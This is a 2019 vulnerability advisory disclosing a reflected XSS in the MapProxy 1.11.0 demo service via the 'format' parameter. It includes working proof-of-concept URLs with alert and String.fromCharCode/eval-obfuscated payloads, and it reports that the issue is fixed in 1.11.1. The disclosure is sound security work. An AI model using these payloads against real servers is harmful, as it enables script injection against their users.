[waraxe-2019-SA#110] - Reflected XSS in MapProxy 1.11.0 ================================================================================ Author: Janek Vind "waraxe" Date: 07. August 2019 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-110.html Target description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MapProxy is an open source proxy for geospatial data. It caches, accelerates and transforms data from existing map services and serves any desktop or web GIS client. https://mapproxy.org/ Vulnerable version: 1.11.0 Fixed version: 1.11.1 ############################################################################### 1. Reflected XSS in demo service ############################################################################### Reason: * Insufficient sanitization of user-supplied data Attack vector: * User-supplied GET parameter "format" Testing for Reflected XSS: https://valid.host/demo/?wmts_layer=valid_layer&format=png"foo'bar&srs=valid_srs Hostname, "wmts_layer" and "srs" must be valid. Let's look at the HTML source: ------------------------[ source code start ]---------------------------------- ------------------------[ source code end ]------------------------------------ We can see that double quote character from GET parameter "format" is not sanitized by MapProxy and this allows us to "break out" from HTML input element. Unfortunately for attacker it's hidden input element and this kind of XSS issues are hard to exploit: https://portswigger.net/blog/xss-in-hidden-input-fields But it appears that there is one more injection point: ------------------------[ source code start ]---------------------------------- var layer = new OpenLayers.Layer.WMTS({ name: "valid_layer", url: '../wmts/valid_layer/{TileMatrixSet}/{TileMatrix}/{TileCol}/{TileRow}.png', layer: 'valid_layer', matrixSet: 'GMC', format: 'png"foo'bar', <--- Injection point isBaseLayer: true, style: 'default', requestEncoding: 'REST' }); ------------------------[ source code end ]------------------------------------ As seen above, MapProxy fails to sanitize single quotes too and this allows us direct JavaScript injection. Working XSS PoC: https://valid.host/demo/?wmts_layer=valid_layer&format=png'-alert('XSS')-'&srs=valid_srs It's worth to mention that XSS payload length is probably limited only with URL max length and test with 1000 byte long payload was successful. One more thing - Chrome web browser has built-in XSS countermeasures, but this exploit works even with Chrome. And of course it's possible to use more sophisticated XSS payloads: https://valid.host/mapproxy/demo/?wmts_layer=valid_layer& format=png'-eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))-'&srs=valid_srs Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 12.07.2019 -> First email sent to developers 12.07.2019 -> Got first response from developers 12.07.2019 -> Sending detailed information to developers 06.08.2019 -> Found problems are fixed, new version available 07.08.2019 -> Waraxe advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/ Personal homepage: http://www.janekvind.com/